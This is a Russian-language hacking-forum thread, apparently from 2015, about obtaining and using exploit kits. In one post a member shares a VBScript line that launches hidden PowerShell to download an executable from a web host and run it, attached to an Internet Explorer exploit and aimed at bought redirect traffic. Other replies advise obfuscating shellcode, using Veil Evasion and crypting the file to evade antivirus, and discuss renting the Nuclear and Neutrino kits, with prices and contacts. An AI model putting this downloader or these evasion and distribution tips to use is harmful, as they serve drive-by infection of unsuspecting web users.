Связки из паблика. Поделитесь ссылками

Discussion in 'Песочница' started by san-ok, 10 Dec 2015.

  1. rct

    rct Active Member

    Joined:
    13 Jun 2015
    Messages:
    359
    Likes Received:
    107
    Reputations:
    7
  2. san-ok

    san-ok New Member

    Joined:
    8 Nov 2015
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    это вроди как фреймворк типа метасплоит, где нужно самому подбирать експлоиты и писать ротатор. с метасплоитом у меня не получилось вообще, такое впечатление что сплоиты в его составе устаревшие и не работают сейчас
     
  3. rct

    rct Active Member

    Joined:
    13 Jun 2015
    Messages:
    359
    Likes Received:
    107
    Reputations:
    7
    Просто показалось что оно на https://github.com/offensive-security/exploit-database-bin-sploits построено.
     
    makarov04546 likes this.
  4. san-ok

    san-ok New Member

    Joined:
    8 Nov 2015
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    Еще вопрос, подскажите кто спец.
    Кроме MSF я отдельно тестировал вот этот сплоит: https://www.exploit-db.com/exploits/35229/
    К нему я прикрепил вот такой загрузчик:

    set shell=createobject("Shell.Application")
    shell.ShellExecute "PowerShell.exe", "-WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://mysite.com/download/mysoft.exe','mysoft.exe');Start-Process 'mysoft.exe'", "", "open", 1

    При тестировании работало обалденно, пробивает мою 7-ю винду с IE 11, тестировал через crossbrowsertesting сервис - успешно пробивало IE 11, IE 9 на Win Vista и Win 7.

    Но, когда купил IE траф отсюда: redirect.com - то где-то 1000 просмотров пустил, и ни одной загрузки...вот почему....что не так..
    Подскажите плз...или с трафом тем что-то не так...тогда где его брать..
     
  5. rct

    rct Active Member

    Joined:
    13 Jun 2015
    Messages:
    359
    Likes Received:
    107
    Reputations:
    7
    Антивири очень строго относятся к схеме загрузил mysoft.exe => сразу запустил mysoft.exe Тем более ты скачиваешь стандартными утилитами винды. Ну это моё мнение.
     
    makarov04546 likes this.
  6. san-ok

    san-ok New Member

    Joined:
    8 Nov 2015
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    Вопрос: какие Payloads в метасплоите более пробиваемы? Реверс-шелы или модуль download_exec?

    Если например взять какой-то реверс-шел и просто получить доступ к компам. А уже потом как-то дать всем команду грузить exe. Наверное это был бы более правильный способ чем сразу exe запускать?
     
    makarov04546 likes this.
  7. private_static

    Joined:
    19 May 2015
    Messages:
    118
    Likes Received:
    76
    Reputations:
    22
    да так не делаются дела,обычно под это дело приватный софт пишут
     
  8. gentype

    gentype Member

    Joined:
    12 Jul 2015
    Messages:
    65
    Likes Received:
    12
    Reputations:
    0
    Почисти шеллкод, обфусцируй его, наполни мусором, метасплоит умеет генерировать разный мусор, еще посмотри в сторону Veil Evasion фреймворк он в купе с метасплоитом работает. да и еще .exe свой тоже криптони и проверь на сервисе каком нибудь, только не вирустототал!
     
  9. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    не,у меня такое ощущение что авторы как раз с метасплойта их и собирают)
    Если по теме уязвимостей и метасплойта то вот хороший китайский сайт http://www.metasploit.cn/forum.php
    Через гугл переводчик
     
    _________________________
  10. rct

    rct Active Member

    Joined:
    13 Jun 2015
    Messages:
    359
    Likes Received:
    107
    Reputations:
    7
    Ясно) Оно хоть обновляется? На сайте битые ссылки, запустил ExploitPack.jar, просит обновиться до 5.01
     
  11. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    http://exploitpack.com/dreadnought.zip
    должно автоматически обновиться потом,я честно говоря пока использую все-таки метасплойт,то этот пак часто барахлит
     
    _________________________
  12. rct

    rct Active Member

    Joined:
    13 Jun 2015
    Messages:
    359
    Likes Received:
    107
    Reputations:
    7
    Автоматом не обновляется, а просто открывает браузер. Суть в другом, я там полазил внутри, обрати внимание на "эксплоит" ExploitPack/exploits/code/Windows-8.1-ahcache.sys.py
    Я ржал))
     
    grimnir likes this.
  13. UNIXTREID

    UNIXTREID Member

    Joined:
    2 Nov 2015
    Messages:
    140
    Likes Received:
    22
    Reputations:
    1
    Посмотрел ссылки... Противоречивое впечатление :) Exploitpack, действительно неоригинальный какой-то, а стоит очень даже весомо )) exploitshop.wordpress устаревший (висит последняя заметка о MS12-020 Remote Code Execution :) Так я вот под него эксплоит до сих пор ищу, нигде нету)

    По поводу эксплоит-китов: Nuclear, конечно, рулит. Но его как найти, в даркнете, наверное, только...В паблике находил только исходники RIG и Blackhole их последних версий (последних уже навечно :D). Круто было бы глянуть на хоть какие-нибудь паблик выкладки Nuclear'а, пусть и старые.

    P.S. Кстати, вы слышали что-нибудь про эксплоит-пак Microsoft Word Intruder ??? Недавно узнал про такой. Действует через скомпилированные вордовские доки (Ну действительно, актуально, удобно). Типа высокий пробив, в паблике экземпляров, якобы, нет...
     
  14. san-ok

    san-ok New Member

    Joined:
    8 Nov 2015
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    скиньте сайт официальный, где Nuclear купить можно. в выдаче посиковой не нахожу
     
  15. seeattack

    seeattack Member

    Joined:
    5 Dec 2009
    Messages:
    17
    Likes Received:
    11
    Reputations:
    0
    официального сайта нету)
    + связку не каждому продадут + она не продается, а сдается в аренду.
     
  16. san-ok

    san-ok New Member

    Joined:
    8 Nov 2015
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    должно же тогда существовать место куда обращаться за услугами аренды :)
     
  17. seeattack

    seeattack Member

    Joined:
    5 Dec 2009
    Messages:
    17
    Likes Received:
    11
    Reputations:
    0
    Jabber
    и на подносе тебе его не принесут)
     
  18. gentype

    gentype Member

    Joined:
    12 Jul 2015
    Messages:
    65
    Likes Received:
    12
    Reputations:
    0
    А у тебя денег хватит хоть на нуклер? Готовь от 500 до 1800 зелени! нуклер не знаю где купить, мб на даркоде или на коровке... Могу помочь с контактами связки нейтрино
     
  19. san-ok

    san-ok New Member

    Joined:
    8 Nov 2015
    Messages:
    31
    Likes Received:
    3
    Reputations:
    0
    я буду иметь тебя в виду, если что обращусь
     
  20. seeattack

    seeattack Member

    Joined:
    5 Dec 2009
    Messages:
    17
    Likes Received:
    11
    Reputations:
    0
    по поводу Nuclear насколько мне известно только аренда...
    около 700$ в неделю..
    зависит от количества трафика которое пройдет через нее.